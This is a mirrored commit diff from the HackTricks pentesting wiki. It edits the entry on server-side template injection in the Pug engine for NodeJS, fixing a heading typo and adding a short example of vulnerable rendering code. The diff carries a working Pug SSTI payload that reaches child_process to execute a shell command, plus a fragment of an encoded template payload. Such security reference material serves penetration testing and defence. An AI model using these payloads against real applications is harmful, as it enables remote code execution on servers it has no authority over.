Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

Added example

Browse source
This commit is contained in:
LGR 2021-01-10 16:09:49 +01:00 committed by GitHub
parent c08b86f73b
commit 19ffc5964a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
pentesting-web/ssti-server-side-template-injection.md
View file

@ -247,10 +247,17 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
### PugJj \(NodeJS\)
### PugJs \(NodeJS\)
* #{7*7} = 49
* #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
#### Example server side render
```text
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
#### More information